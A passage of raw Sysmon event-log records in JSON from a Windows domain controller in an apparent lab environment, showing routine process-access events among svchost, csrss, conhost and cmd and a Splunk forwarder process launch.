C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010F7560500}\r\nTargetProcessId: 1188\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010F7560500}","TargetProcessId":"1188","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010F7560500}\r\nSourceProcessId: 1188\r\nSourceThreadId: 4496\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001080560500}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010F7560500}","SourceProcessId":"1188","SourceThreadId":"4496","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001080560500}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.819\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-00101B580500}\r\nProcessId: 4584\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-001080560500}\r\nParentProcessId: 1180\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.819","ProcessGuid":"{41C8662E-1FF3-5F25-0000-00101B580500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-001080560500}","ParentProcessId":"1180","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001080560500}\r\nSourceProcessId: 1180\r\nSourceThreadId: 1196\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00101B580500}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001080560500}","SourceProcessId":"1180","SourceThreadId":"1196","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00101B580500}","TargetProcessId":"4584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00101B580500}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 